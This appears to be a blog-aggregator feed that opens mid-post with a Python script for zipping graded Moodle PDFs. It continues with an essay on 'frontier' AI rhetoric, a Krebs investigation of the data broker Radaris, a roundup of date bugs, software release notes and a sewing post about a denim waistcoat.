usage: ./moodle-zip.py <target_dir>
"""

import os
import shutil
import sys
import tempfile

from fnmatch import fnmatch


def sanity(directory):
    """Run sanity checks before doing anything else"""
    base_directory = os.path.basename(os.path.normpath(directory))
    if not os.path.isdir(directory):
        sys.exit(f"Target directory {directory} is not a valid directory")
    if os.path.exists(f"/tmp/{base_directory}.zip"):
        sys.exit(f"Final ZIP file path '/tmp/{base_directory}.zip' already exists")
    for root, dirnames, _ in os.walk(directory):
        for dirname in dirnames:
            corrige_present = False
            for file in os.listdir(os.path.join(root, dirname)):
                if fnmatch(file, 'graded paper.pdf'):
                    corrige_present = True
            if corrige_present is False:
                sys.exit(f"Directory {dirname} does not contain a 'graded paper.pdf' file")


def clean(directory):
    """Remove superfluous files, to keep only the graded PDF"""
    with tempfile.TemporaryDirectory() as tmp_dir:
        shutil.copytree(directory, tmp_dir, dirs_exist_ok=True)
        for root, _, filenames in os.walk(tmp_dir):
            for file in filenames:
                if not fnmatch(file, 'graded paper.pdf'):
                    os.remove(os.path.join(root, file))
        compress(tmp_dir, directory)


def compress(directory, target_dir):
    """Compress directory into a ZIP file and save it to the target dir"""
    target_dir = os.path.basename(os.path.normpath(target_dir))
    shutil.make_archive(f"/tmp/{target_dir}", 'zip', directory)
    print(f"Final ZIP file has been saved to '/tmp/{target_dir}.zip'")


def main():
    """Main function"""
    target_dir = sys.argv[1]
    sanity(target_dir)
    clean(target_dir)


if __name__ == "__main__":
    main()

If for some reason you happen to have a similar workflow as I and end up using this script, hit me up?

Now, back to grading...


  1. If I recall correctly, the lazy way I used to do it involved copying the directory, renaming the extension of the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons... 

Cryptogram How the “Frontier” Became the Slogan of Uncontrolled AI

Artificial intelligence (AI) has been billed as the next frontier of humanity: the newly available expanse whose exploration will drive the next era of growth, wealth, and human flourishing. It’s a scary metaphor. Throughout American history, the drive for expansion and the very concept of terrain up for grabs—land grabs, gold rushes, new frontiers—have provided a permission structure for imperialism and exploitation. This could easily hold true for AI.

This isn’t the first time the concept of a frontier has been used as a metaphor for AI, or technology in general. As early as 2018, the powerful foundation models powering cutting-edge applications like chatbots have been called “frontier AI.” In previous decades, the internet itself was considered an electronic frontier. Early cyberspace pioneer John Perry Barlow wrote “Unlike previous frontiers, this one has no end.” When he and others founded the internet’s most important civil liberties organization, they called it the Electronic Frontier Foundation.

America’s experience with frontiers is fraught, to say the least. Expansion into the Western frontier and beyond has been a driving force in our country’s history and identity—and has led to some of the darkest chapters of our past. The tireless drive to conquer the frontier has directly motivated some of this nation’s most extreme episodes of racism, imperialism, violence, and exploitation.

That history has something to teach us about the material consequences we can expect from the promotion of AI today. The race to build the next great AI app is not the same as the California gold rush. But the potential that outsize profits will warp our priorities, values, and morals is, unfortunately, analogous.

Already, AI is starting to look like a colonialist enterprise. AI tools are helping the world’s largest tech companies grow their power and wealth, are spurring nationalistic competition between empires racing to capture new markets, and threaten to supercharge government surveillance and systems of apartheid. It looks more than a bit like the competition among colonialist state and corporate powers in the seventeenth century, which together carved up the globe and its peoples. By considering America’s past experience with frontiers, we can understand what AI may hold for our future, and how to avoid the worst potential outcomes.

America’s “Frontier” Problem

For 130 years, historians have used frontier expansion to explain sweeping movements in American history. Yet only for the past thirty years have we generally acknowledged its disastrous consequences.

Frederick Jackson Turner famously introduced the frontier as a central concept for understanding American history in his vastly influential 1893 essay. As he concisely wrote, “American history has been in a large degree the history of the colonization of the Great West.”

Turner used the frontier to understand all the essential facts of American life: our culture, way of government, national spirit, our position among world powers, even the “struggle” of slavery. The endless opportunity for westward expansion was a beckoning call that shaped the American way of life. Per Turner’s essay, the frontier resulted in the individualistic self-sufficiency of the settler and gave every (white) man the opportunity to attain economic and political standing through hardscrabble pioneering across dangerous terrain.The New Western History movement, gaining steam through the 1980s and led by researchers like Patricia Nelson Limerick, laid plain the racial, gender, and class dynamics that were always inherent to the frontier narrative. This movement’s story is one where frontier expansion was a tool used by the white settler to perpetuate a power advantage.The frontier was not a siren calling out to unwary settlers; it was a justification, used by one group to subjugate another. It was always a convenient, seemingly polite excuse for the powerful to take what they wanted. Turner grappled with some of the negative consequences and contradictions of the frontier ethic and how it shaped American democracy. But many of those whom he influenced did not do this; they celebrated it as a feature, not a bug. Theodore Roosevelt wrote extensively and explicitly about how the frontier and his conception of white supremacy justified expansion to points west and, through the prosecution of the Spanish-American War, far across the Pacific. Woodrow Wilson, too, celebrated the imperial loot from that conflict in 1902. Capitalist systems are “addicted to geographical expansion” and even, when they run out of geography, seek to produce new kinds of spaces to expand into. This is what the geographer David Harvey calls the “spatial fix.”Claiming that AI will be a transformative expanse on par with the Louisiana Purchase or the Pacific frontiers is a bold assertion—but increasingly plausible after a year dominated by ever more impressive demonstrations of generative AI tools. It’s a claim bolstered by billions of dollars in corporate investment, by intense interest of regulators and legislators worldwide in steering how AI is developed and used, and by the variously utopian or apocalyptic prognostications from thought leaders of all sectors trying to understand how AI will shape their sphere—and the entire world.

AI as a Permission Structure

Like the western frontier in the nineteenth century, the maniacal drive to unlock progress via advancement in AI can become a justification for political and economic expansionism and an excuse for racial oppression.

In the modern day, OpenAI famously paid dozens of Kenyans little more than a dollar an hour to process data used in training their models underlying products such as ChatGPT. Paying low wages to data labelers surely can’t be equated to the chattel slavery of nineteenth-century America. But these workers did endure brutal conditions, including being set to constantly review content with “graphic scenes of violence, self-harm, murder, rape, necrophilia, child abuse, bestiality, and incest.” There is a global market for this kind of work, which has been essential to the most important recent advances in AI such as Reinforcement Learning with Human Feedback, heralded as the most important breakthrough of ChatGPT.

The gold rush mentality associated with expansion is taken by the new frontiersmen as permission to break the rules, and to build wealth at the expense of everyone else. In 1840s California, gold miners trespassed on public lands and yet were allowed to stake private claims to the minerals they found, and even to exploit the water rights on those lands. Again today, the game is to push the boundaries on what rule-breaking society will accept, and hope that the legal system can’t keep up.

Many internet companies have behaved in exactly the same way since the dot-com boom. The prospectors of internet wealth lobbied for, or simply took of their own volition, numerous government benefits in their scramble to capture those frontier markets. For years, the Federal Trade Commission has looked the other way or been lackadaisical in halting antitrust abuses by Amazon, Facebook, and Google. Companies like Uber and Airbnb exploited loopholes in, or ignored outright, local laws on taxis and hotels. And Big Tech platforms enjoyed a liability shield that protected them from punishment the contents people posted to their sites.

We can already see this kind of boundary pushing happening with AI.

Modern frontier AI models are trained using data, often copyrighted materials, with untested legal justification. Data is like water for AI, and, like the fight over water rights in the West, we are repeating a familiar process of public acquiescence to private use of resources. While some lawsuits are pending, so far AI companies have faced no significant penalties for the unauthorized use of this data.

Pioneers of self-driving vehicles tried to skip permitting processes and used fake demonstrations of their capabilities to avoid government regulation and entice consumers. Meanwhile, AI companies’ hope is that they won’t be held to blame if the AI tools they produce spew out harmful content that causes damage in the real world. They are trying to use the same liability shield that fostered Big Tech’s exploitation of the previous electronic frontiers—the web and social media—to protect their own actions.

Even where we have concrete rules governing deleterious behavior, some hope that using AI is itself enough to skirt them. Copyright infringement is illegal if a person does it, but would that same person be punished if they train a large language model to regurgitate copyrighted works? In the political sphere, the Federal Election Commission has precious few powers to police political advertising; some wonder if they simply won’t be considered relevant if people break those rules using AI.

AI and American Exceptionalism

Like The United States’ historical frontier, AI has a feel of American exceptionalism. Historically, we believed we were different from the Old World powers of Europe because we enjoyed the manifest destiny of unrestrained expansion between the oceans. Today, we have the most CPU power, the most data scientists, the most venture-capitalist investment, and the most AI companies. This exceptionalism has historically led many Americans to believe they don’t have to play by the same rules as everyone else.

Both historically and in the modern day, this idea has led to deleterious consequences such as militaristic nationalism (leading to justifying of foreign interventions in Iraq and elsewhere), masking of severe inequity within our borders, abdication of responsibility from global treaties on climate and law enforcement, and alienation from the international community. American exceptionalism has also wrought havoc on our country’s engagement with the internet, including lawless spying and surveillance by forces like the National Security Agency.

The same line of thinking could have disastrous consequences if applied to AI. It could perpetuate a nationalistic, Cold War–style narrative about America’s inexorable struggle with China, this time predicated on an AI arms race. Moral exceptionalism justifies why we should be allowed to use tools and weapons that are dangerous in the hands of a competitor, or enemy. It could enable the next stage of growth of the military-industrial complex, with claims of an urgent need to modernize missile systems and drones through using AI. And it could renew a rationalization for violating civil liberties in the US and human rights abroad, empowered by the idea that racial profiling is more objective if enforced by computers.The inaction of Congress on AI regulation threatens to land the US in a regime of de facto American exceptionalism for AI. While the EU is about to pass its comprehensive AI Act, lobbyists in the US have muddled legislative action. While the Biden administration has used its executive authority and federal purchasing power to exert some limited control over AI, the gap left by lack of legislation leaves AI in the US looking like the Wild West—a largely unregulated frontier.The lack of restraint by the US on potentially dangerous AI technologies has a global impact. First, its tech giants let loose their products upon the global public, with the harms that this brings with it. Second, it creates a negative incentive for other jurisdictions to more forcefully regulate AI. The EU’s regulation of high-risk AI use cases begins to look like unilateral disarmament if the US does not take action itself. Why would Europe tie the hands of its tech competitors if the US refuses to do the same?

AI and Unbridled Growth

The fundamental problem with frontiers is that they seem to promise cost-free growth. There was a constant pressure for American westward expansion because a bigger, more populous country accrues more power and wealth to the elites and because, for any individual, a better life was always one more wagon ride away into “empty” terrain. AI presents the same opportunities. No matter what field you’re in or what problem you’re facing, the attractive opportunity of AI as a free labor multiplier probably seems like the solution; or, at least, makes for a good sales pitch.

That would actually be okay, except that the growth isn’t free. America’s imperial expansion displaced, harmed, and subjugated native peoples in the Americas, Africa, and the Pacific, while enlisting poor whites to participate in the scheme against their class interests. Capitalism makes growth look like the solution to all problems, even when it’s clearly not. The problem is that so many costs are externalized. Why pay a living wage to human supervisors training AI models when an outsourced gig worker will do it at a fraction of the cost? Why power data centers with renewable energy when it’s cheaper to surge energy production with fossil fuels? And why fund social protections for wage earners displaced by automation if you don’t have to? The potential of consumer applications of AI, from personal digital assistants to self-driving cars, is irresistible; who wouldn’t want a machine to take on the most routinized and aggravating tasks in your daily life? But the externalized cost for consumers is accepting the inevitability of domination by an elite who will extract every possible profit from AI services.

Controlling Our Frontier Impulses

None of these harms are inevitable. Although the structural incentives of capitalism and its growth remain the same, we can make different choices about how to confront them.

We can strengthen basic democratic protections and market regulations to avoid the worst impacts of AI colonialism. We can require ethical employment for the humans toiling to label data and train AI models. And we can set the bar higher for mitigating bias in training and harm from outputs of AI models.

We don’t have to cede all the power and decision making about AI to private actors. We can create an AI public option to provide an alternative to corporate AI. We can provide universal access to ethically built and democratically governed foundational AI models that any individual—or company—could use and build upon.

More ambitiously, we can choose not to privatize the economic gains of AI. We can cap corporate profits, raise the minimum wage, or redistribute an automation dividend as a universal basic income to let everyone share in the benefits of the AI revolution. And, if these technologies save as much labor as companies say they do, maybe we can also all have some of that time back.

And we don’t have to treat the global AI gold rush as a zero-sum game. We can emphasize international cooperation instead of competition. We can align on shared values with international partners and create a global floor for responsible regulation of AI. And we can ensure that access to AI uplifts developing economies instead of further marginalizing them.

This essay was written with Nathan Sanders, and was originally published in Jacobin.

Krebs on SecurityA Close Up Look at the Consumer Data Broker Radaris

If you live in the United States, the data broker Radaris likely knows a great deal about you, and they are happy to sell what they know to anyone. But how much do we know about Radaris? Publicly available data indicates that in addition to running a dizzying array of people-search websites, the co-founders of Radaris operate multiple Russian-language dating services and affiliate programs. It also appears many of their businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

Formed in 2009, Radaris is a vast people-search network for finding data on individuals, properties, phone numbers, businesses and addresses. Search for any American’s name in Google and the chances are excellent that a listing for them at Radaris.com will show up prominently in the results.

Radaris reports typically bundle a substantial amount of data scraped from public and court documents, including any current or previous addresses and phone numbers, known email addresses and registered domain names. The reports also list address and phone records for the target’s known relatives and associates. Such information could be useful if you were trying to determine the maiden name of someone’s mother, or successfully answer a range of other knowledge-based authentication questions.

Currently, consumer reports advertised for sale at Radaris.com are being fulfilled by a different people-search company called TruthFinder. But Radaris also operates a number of other people-search properties — like Centeda.com — that sell consumer reports directly and behave almost identically to TruthFinder: That is, reel the visitor in with promises of detailed background reports on people, and then charge a $34.99 monthly subscription fee just to view the results.

The Better Business Bureau (BBB) assigns Radaris a rating of “F” for consistently ignoring consumers seeking to have their information removed from Radaris’ various online properties. Of the 159 complaints detailed there in the last year, several were from people who had used third-party identity protection services to have their information removed from Radaris, only to receive a notice a few months later that their Radaris record had been restored.

What’s more, Radaris’ automated process for requesting the removal of your information requires signing up for an account, potentially providing more information about yourself that the company didn’t already have (see screenshot above).

Radaris has not responded to requests for comment.

Radaris, TruthFinder and others like them all force users to agree that their reports will not be used to evaluate someone’s eligibility for credit, or a new apartment or job. This language is so prominent in people-search reports because selling reports for those purposes would classify these firms as consumer reporting agencies (CRAs) and expose them to regulations under the Fair Credit Reporting Act (FCRA).

These data brokers do not want to be treated as CRAs, and for this reason their people search reports typically do not include detailed credit histories, financial information, or full Social Security Numbers (Radaris reports include the first six digits of one’s SSN).

But in September 2023, the U.S. Federal Trade Commission found that TruthFinder and another people-search service Instant Checkmate were trying to have it both ways. The FTC levied a $5.8 million penalty against the companies for allegedly acting as CRAs because they assembled and compiled information on consumers into background reports that were marketed and sold for employment and tenant screening purposes.

An excerpt from the FTC’s complaint against TruthFinder and Instant Checkmate.

The FTC also found TruthFinder and Instant Checkmate deceived users about background report accuracy. The FTC alleges these companies made millions from their monthly subscriptions using push notifications and marketing emails that claimed that the subject of a background report had a criminal or arrest record, when the record was merely a traffic ticket.

“All the while, the companies touted the accuracy of their reports in online ads and other promotional materials, claiming that their reports contain “the MOST ACCURATE information available to the public,” the FTC noted. The FTC says, however, that all the information used in their background reports is obtained from third parties that expressly disclaim that the information is accurate, and that TruthFinder and Instant Checkmate take no steps to verify the accuracy of the information.

The FTC said both companies deceived customers by providing “Remove” and “Flag as Inaccurate” buttons that did not work as advertised. Rather, the “Remove” button removed the disputed information only from the report as displayed to that customer; however, the same item of information remained visible to other customers who searched for the same person.

The FTC also said that when a customer flagged an item in the background report as inaccurate, the companies never took any steps to investigate those claims, to modify the reports, or to flag to other customers that the information had been disputed.

WHO IS RADARIS?

According to Radaris’ profile at the investor website Pitchbook.com, the company’s founder and “co-chief executive officer” is a Massachusetts resident named Gary Norden, also known as Gary Nard.

An analysis of email addresses known to have been used by Mr. Norden shows he is a native Russian man whose real name is Igor Lybarsky (also spelled Lubarsky). Igor’s brother Dmitry, who goes by “Dan,” appears to be the other co-CEO of Radaris. Dmitry Lybarsky’s Facebook/Meta account says he was born in March 1963.

The Lybarsky brothers Dmitry or “Dan” (left) and Igor a.k.a. “Gary,” in an undated photo.

Indirectly or directly, the Lybarskys own multiple properties in both Sherborn and Wellesley, Mass. However, the Radaris website is operated by an offshore entity called Bitseller Expert Ltd, which is incorporated in Cyprus. Neither Lybarsky brother responded to requests for comment.

A review of the domain names registered by Gary Norden shows that beginning in the early 2000s, he and Dan built an e-commerce empire by marketing prepaid calling cards and VOIP services to Russian expatriates who are living in the United States and seeking an affordable way to stay in touch with loved ones back home.

A Sherborn, Mass. property owned by Barsky Real Estate Trust and Dmitry Lybarsky.

In 2012, the main company in charge of providing those calling services — Wellesley Hills, Mass-based Unipoint Technology Inc. — was fined $179,000 by the U.S. Federal Communications Commission, which said Unipoint never applied for a license to provide international telecommunications services.

DomainTools.com shows the email address gnard@unipointtech.com is tied to 137 domains, including radaris.com. DomainTools also shows that the email addresses used by Gary Norden for more than two decades — epop@comby.com, gary@barksy.com and gary1@eprofit.com, among others — appear in WHOIS registration records for an entire fleet of people-search websites, including: centeda.com, virtory.com, clubset.com, kworld.com, newenglandfacts.com, and pub360.com.

Still more people-search platforms tied to Gary Norden– like publicreports.com and arrestfacts.com — currently funnel interested customers to third-party search companies, such as TruthFinder and PersonTrust.com.

The email addresses used by Gary Nard/Gary Norden are also connected to a slew of data broker websites that sell reports on businesses, real estate holdings, and professionals, including bizstanding.com, homemetry.com, trustoria.com, homeflock.com, rehold.com, difive.com and projectlab.com.

AFFILIATE & ADULT

Domain records indicate that Gary and Dan for many years operated a now-defunct pay-per-click affiliate advertising network called affiliate.ru. That entity used domain name servers tied to the aforementioned domains comby.com and eprofit.com, as did radaris.ru.

A machine-translated version of Affiliate.ru, a Russian-language site that advertised hundreds of money making affiliate programs, including the Comfi.com prepaid calling card affiliate.

Comby.com used to be a Russian language social media network that looked a great deal like Facebook. The domain now forwards visitors to Privet.ru (“hello” in Russian), a dating site that claims to have 5 million users. Privet.ru says it belongs to a company called Dating Factory, which lists offices in Switzerland. Privet.ru uses the Gary Norden domain eprofit.com for its domain name servers.

Dating Factory’s website says it sells “powerful dating technology” to help customers create unique or niche dating websites. A review of the sample images available on the Dating Factory homepage suggests the term “dating” in this context refers to adult websites. Dating Factory also operates a community called FacebookOfSex, as well as the domain analslappers.com.

RUSSIAN AMERICA

Email addresses for the Comby and Eprofit domains indicate Gary Norden operates an entity in Wellesley Hills, Mass. called RussianAmerican Holding Inc. (russianamerica.com). This organization is listed as the owner of the domain newyork.ru, which is a site dedicated to orienting newcomers from Russia to the Big Apple.

Newyork.ru’s terms of service refer to an international calling card company called ComFi Inc. (comfi.com) and list an address as PO Box 81362 Wellesley Hills, Ma. Other sites that include this address are russianamerica.com, russianboston.com, russianchicago.com, russianla.com, russiansanfran.com, russianmiami.com, russiancleveland.com and russianseattle.com (currently offline).

ComFi is tied to Comfibook.com, which was a search aggregator website that collected and published data from many online and offline sources, including phone directories, social networks, online photo albums, and public records.

The current website for russianamerica.com. Note the ad in the bottom left corner of this image for Channel One, a Russian state-owned media firm that is currently sanctioned by the U.S. government.

AMERICAN RUSSIAN MEDIA

Many of the U.S. city-specific online properties apparently tied to Gary Norden include phone numbers on their contact pages for a pair of Russian media and advertising firms based in southern California. The phone number 323-874-8211 appears on the websites russianla.com, russiasanfran.com, and rosconcert.com, which sells tickets to theater events performed in Russian.

Historic domain registration records from DomainTools show rosconcert.com was registered in 2003 to Unipoint Technologies — the same company fined by the FCC for not having a license. Rosconcert.com also lists the phone number 818-377-2101.

A phone number just a few digits away — 323-874-8205 — appears as a point of contact on newyork.ru, russianmiami.com, russiancleveland.com, and russianchicago.com. A search in Google shows this 82xx number range — and the 818-377-2101 number — belong to two different entities at the same UPS Store mailbox in Tarzana, Calif: American Russian Media Inc. (armediacorp.com), and Lamedia.biz.

Armediacorp.com is the home of FACT Magazine, a glossy Russian-language publication put out jointly by the American-Russian Business Council, the Hollywood Chamber of Commerce, and the West Hollywood Chamber of Commerce.

Lamedia.biz says it is an international media organization with more than 25 years of experience within the Russian-speaking community on the West Coast. The site advertises FACT Magazine and the Russian state-owned media outlet Channel One. Clicking the Channel One link on the homepage shows Lamedia.biz offers to submit advertising spots that can be shown to Channel One viewers. The price for a basic ad is listed at $500.

In May 2022, the U.S. government levied financial sanctions against Channel One that bar US companies or citizens from doing business with the company.

The website of lamedia.biz offers to sell advertising on two Russian state-owned media firms currently sanctioned by the U.S. government.

LEGAL ACTIONS AGAINST RADARIS

In 2014, a group of people sued Radaris in a class-action lawsuit claiming the company’s practices violated the Fair Credit Reporting Act. Court records indicate the defendants never showed up in court to dispute the claims, and as a result the judge eventually awarded the plaintiffs a default judgement and ordered the company to pay $7.5 million.

But the plaintiffs in that civil case had a difficult time collecting on the court’s ruling. In response, the court ordered the radaris.com domain name (~9.4M monthly visitors) to be handed over to the plaintiffs.

However, in 2018 Radaris was able to reclaim their domain on a technicality. Attorneys for the company argued that their clients were never named as defendants in the original lawsuit, and so their domain could not legally be taken away from them in a civil judgment.

“Because our clients were never named as parties to the litigation, and were never served in the litigation, the taking of their property without due process is a violation of their rights,” Radaris’ attorneys argued.

In October 2023, an Illinois resident filed a class-action lawsuit against Radaris for allegedly using people’s names for commercial purposes, in violation of the Illinois Right of Publicity Act.

On Feb. 8, 2024, a company called Atlas Data Privacy Corp. sued Radaris LLC for allegedly violating “Daniel’s Law,” a statute that allows New Jersey law enforcement, government personnel, judges and their families to have their information completely removed from people-search services and commercial data brokers. Atlas has filed at least 140 similar Daniel’s Law complaints against data brokers recently.

Daniel’s Law was enacted in response to the death of 20-year-old Daniel Anderl, who was killed in a violent attack targeting a federal judge (his mother). In July 2020, a disgruntled attorney who had appeared before U.S. District Judge Esther Salas disguised himself as a Fedex driver, went to her home and shot and killed her son (the judge was unharmed and the assailant killed himself).

Earlier this month, The Record reported on Atlas Data Privacy’s lawsuit against LexisNexis Risk Data Management, in which the plaintiffs representing thousands of law enforcement personnel in New Jersey alleged that after they asked for their information to remain private, the data broker retaliated against them by freezing their credit and falsely reporting them as identity theft victims.

Another data broker sued by Atlas Data Privacy — pogodata.com — announced on Mar. 1 that it was likely shutting down because of the lawsuit.

“The matter is far from resolved but your response motivates us to try to bring back most of the names while preserving redaction of the 17,000 or so clients of the redaction company,” the company wrote. “While little consolation, we are not alone in the suit – the privacy company sued 140 property-data sites at the same time as PogoData.”

Atlas says their goal is convince more states to pass similar laws, and to extend those protections to other groups such as teachers, healthcare personnel and social workers. Meanwhile, media law experts say they’re concerned that enacting Daniel’s Law in other states would limit the ability of journalists to hold public officials accountable, and allow authorities to pursue criminals charges against media outlets that publish the same type of public and governments records that fuel the people-search industry.

PEOPLE-SEARCH CARVE-OUTS

There are some pending changes to the US legal and regulatory landscape that could soon reshape large swaths of the data broker industry. But experts say it is unlikely that any of these changes will affect people-search companies like Radaris.

On Feb. 28, 2024, the White House issued an executive order that directs the U.S. Department of Justice (DOJ) to create regulations that would prevent data brokers from selling or transferring abroad certain data types deemed too sensitive, including genomic and biometric data, geolocation and financial data, as well as other as-yet unspecified personal identifiers. The DOJ this week published a list of more than 100 questions it is seeking answers to regarding the data broker industry.

In August 2023, the Consumer Financial Protection Bureau (CFPB) announced it was undertaking new rulemaking related to data brokers.

Justin Sherman, an adjunct professor at Duke University, said neither the CFPB nor White House rulemaking will likely address people-search brokers because these companies typically get their information by scouring federal, state and local government records. Those government files include voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, bankruptcy filings, and more.

“These dossiers contain everything from individuals’ names, addresses, and family information to data about finances, criminal justice system history, and home and vehicle purchases,” Sherman wrote in an October 2023 article for Lawfare. “People search websites’ business pitch boils down to the fact that they have done the work of compiling data, digitizing it, and linking it to specific people so that it can be searched online.”

Sherman said while there are ongoing debates about whether people search data brokers have legal responsibilities to the people about whom they gather and sell data, the sources of this information — public records — are completely carved out from every single state consumer privacy law.

“Consumer privacy laws in California, Colorado, Connecticut, Delaware, Indiana, Iowa, Montana, Oregon, Tennessee, Texas, Utah, and Virginia all contain highly similar or completely identical carve-outs for ‘publicly available information’ or government records,” Sherman wrote. “Tennessee’s consumer data privacy law, for example, stipulates that “personal information,” a cornerstone of the legislation, does not include ‘publicly available information,’ defined as:

“…information that is lawfully made available through federal, state, or local government records, or information that a business has a reasonable basis to believe is lawfully made available to the general public through widely distributed media, by the consumer, or by a person to whom the consumer has disclosed the information, unless the consumer has restricted the information to a specific audience.”

Sherman said this is the same language as the carve-out in the California privacy regime, which is often held up as the national leader in state privacy regulations. He said with a limited set of exceptions for survivors of stalking and domestic violence, even under California’s newly passed Delete Act — which creates a centralized mechanism for consumers to ask some third-party data brokers to delete their information — consumers across the board cannot exercise these rights when it comes to data scraped from property filings, marriage certificates, and public court documents, for example.

“With some very narrow exceptions, it’s either extremely difficult or impossible to compel these companies to remove your information from their sites,” Sherman told KrebsOnSecurity. “Even in states like California, every single consumer privacy law in the country completely exempts publicly available information.”

Below is a mind map that helped KrebsOnSecurity track relationships between and among the various organizations named in the story above:

A mind map of various entities apparently tied to Radaris and the company’s co-founders. Click to enlarge.

Worse Than FailureError'd: Time for more leap'd years

Inability to properly program dates continued to afflict various websites last week, even though the leap day itself had passed. Maybe we need a new programming language in which it's impossible to forget about timezones, leap years, or Thursday.

Timeless Thomas subtweeted "I'm sure there's a great date-related WTF story behind this tweet" Gosh, I can't imagine what error this could be referring to.

date

 

Data historian Jonathan babbled "Today, the 1st of March, is the start of a new tax year here and my brother wanted to pull the last years worth of transactions from a financial institution to declare his taxes. Of course the real WTF is that they only allow up to 12 months." I am not able rightly to apprehend the confusion of ideas that could provoke such an error'd.

leap

 

Ancient Matthew S. breathed a big sigh of relief on seeing this result: "Good to know that I'm up to date as of 422 years ago!"

05

 

Jaroslaw gibed "Looks like a translation mishap... What if I didn't knew English?" Indeed.

vlsc

 

Hardjay vexillologist Julien casts some shade without telling us where to direct our disdain "I don't think you can have dark mode country flags..." He's not wrong.

flag

 

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

365 TomorrowsAsk the Thompsons

Author: Jennifer Thomas Get advice from three generations of Thompson women: Sara (age 90), Lydia (age 60), and Willa (age 15)! They all receive the same questions but answer independently. Today they discuss the most-asked question of the year! Dear Thompsons, My partner and I are arguing about whether to have children. I want a […]

The post Ask the Thompsons appeared first on 365tomorrows.

Planet DebianReproducible Builds (diffoscope): diffoscope 260 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 260. This version includes the following changes:

[ Chris Lamb ]
* Actually test 7z support in the test_7z set of tests, not the lz4
  functionality. (Closes: reproducible-builds/diffoscope#359)
* In addition, correctly check for the 7z binary being available
  (and not lz4) when testing 7z.
* Prevent a traceback when comparing a contentful .pyc file with an
  empty one. (Re: Debian:#1064973)

You find out more by visiting the project homepage.

Planet DebianValhalla's Things: Denim Waistcoat

Posted on March 8, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

A woman wearing a single breasted waistcoat with double darts at the waist, two pocket flaps at the waist and one on the left upper breast. It has four jeans buttons.

I had finished sewing my jeans, I had a scant 50 cm of elastic denim left.

Unrelated to that, I had just finished drafting a vest with Valentina, after the Cutters’ Practical Guide to the Cutting of Ladies Garments.

A new pattern requires a (wearable) mockup. 50 cm of leftover fabric require a quick project. The decision didn’t take a lot of time.

As a mockup, I kept things easy: single layer with no lining, some edges finished with a topstitched hem and some with bias tape, and plain tape on the fronts, to give more support to the buttons and buttonholes.

I did add pockets: not real welt ones (too much effort on denim), but simple slits covered by flaps.

a rectangle of pocketing fabric on the wrong side of a denim

piece; there is a slit in the middle that has been finished with topstitching.

To do them I marked the slits, then I cut two rectangles of pocketing fabric that should have been as wide as the slit + 1.5 cm (width of the pocket) + 3 cm (allowances) and twice the sum of as tall as I wanted the pocket to be plus 1 cm (space above the slit) + 1.5 cm (allowances).

Then I put the rectangle on the right side of the denim, aligned so that the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut, turned the pocketing to the wrong side, pressed and topstitched 2 mm from the fold to finish the slit.

a piece of pocketing fabric folded in half and sewn on all 3

other sides; it does not lay flat on the right side of the fabric because the finished slit (hidden in the picture) is pulling it.

Then I turned the pocketing back to the right side, folded it in half, sewed the side and top seams with a small allowance, pressed and turned it again to the wrong side, where I sewed the seams again to make a french seam.

And finally, a simple rectangular denim flap was topstitched to the front, covering the slits.

I wasn’t as precise as I should have been and the pockets aren’t exactly the right size, but they will do to see if I got the positions right (I think that the breast one should be a cm or so lower, the waist ones are fine), and of course they are tiny, but that’s to be expected from a waistcoat.

The back of the waistcoat,

The other thing that wasn’t exactly as expected is the back: the pattern splits the bottom part of the back to give it “sufficient spring over the hips”. The book is probably published in 1892, but I had already found when drafting the foundation skirt that its idea of “hips” includes a bit of structure. The “enough steel to carry a book or a cup of tea” kind of structure. I should have expected a lot of spring, and indeed that’s what I got.

To fit the bottom part of the back on the limited amount of fabric I had to piece it, and I suspect that the flat felled seam in the center is helping it sticking out; I don’t think it’s exactly bad, but it is a peculiar look.

Also, I had to cut the back on the fold, rather than having a seam in the middle and the grain on a different angle.

Anyway, my next waistcoat project is going to have a linen-cotton lining and silk fashion fabric, and I’d say that the pattern is good enough that I can do a few small fixes and cut it directly in the lining, using it as a second mockup.

As for the wrinkles, there is quite a bit, but it looks something that will be solved by a bit of lightweight boning in the side seams and in the front; it will be seen in the second mockup and the finished waistcoat.

As for this one, it’s definitely going to get some wear as is, in casual contexts. Except. Well, it’s a denim waistcoat, right? With a very different cut from the “get a denim jacket and rip out the sleeves”, but still a denim waistcoat, right? The kind that you cover in patches, right?

Outline of a sewing machine with teeth and crossed bones below it, and the text “home sewing is killing fashion / and it's illegal”

And I may have screenprinted a “home sewing is killing fashion” patch some time ago, using the SVG from wikimedia commons / the Home Taping is Killing Music page.

And. Maybe I’ll wait until I have finished the real waistcoat. But I suspect that one, and other sewing / costuming patches may happen in the future.

No regrets, as the words on my seam ripper pin say, right? :D

,

Planet DebianDirk Eddelbuettel: prrd 0.0.6 at CRAN: Several Improvements

Thrilled to share that a new version of prrd arrived at CRAN yesterday in a first update in two and a half years. prrd facilitates the parallel running [of] reverse dependency [checks] when preparing R packages. It is used extensively for releases I make of Rcpp, RcppArmadillo, RcppEigen, BH, and others.

prrd screenshot image

The key idea of prrd is simple, and described in some more detail on its webpage and its GitHub repo. Reverse dependency checks are an important part of package development that is easily done in a (serial) loop. But these checks are also generally embarassingly parallel as there is no or little interdependency between them (besides maybe shared build depedencies). See the (dated) screenshot (running six parallel workers, arranged in a split byobu session).

This release, the first since 2021, brings a number of enhancments. In particular, the summary function is now improved in several ways. Josh also put in a nice PR that generalizes some setup defaults and values.

The release is summarised in the NEWS entry:

Changes in prrd version 0.0.6 (2024-03-06)

  • The summary function has received several enhancements:

    • Extended summary is only running when failures are seen.

    • The summariseQueue function now displays an anticipated completion time and remaining duration.

    • The use of optional package foghorn has been refined, and refactored, when running summaries.

  • The dequeueJobs.r scripts can receive a date argument, the date can be parse via anydate if anytime ins present.

  • The enqueeJobs.r now considers skipped package when running 'addfailed' while ensuring selecting packages are still on CRAN.

  • The CI setup has been updated (twice),

  • Enqueing and dequing functions and scripts now support relative directories, updated documentation (#18 by Joshua Ulrich).

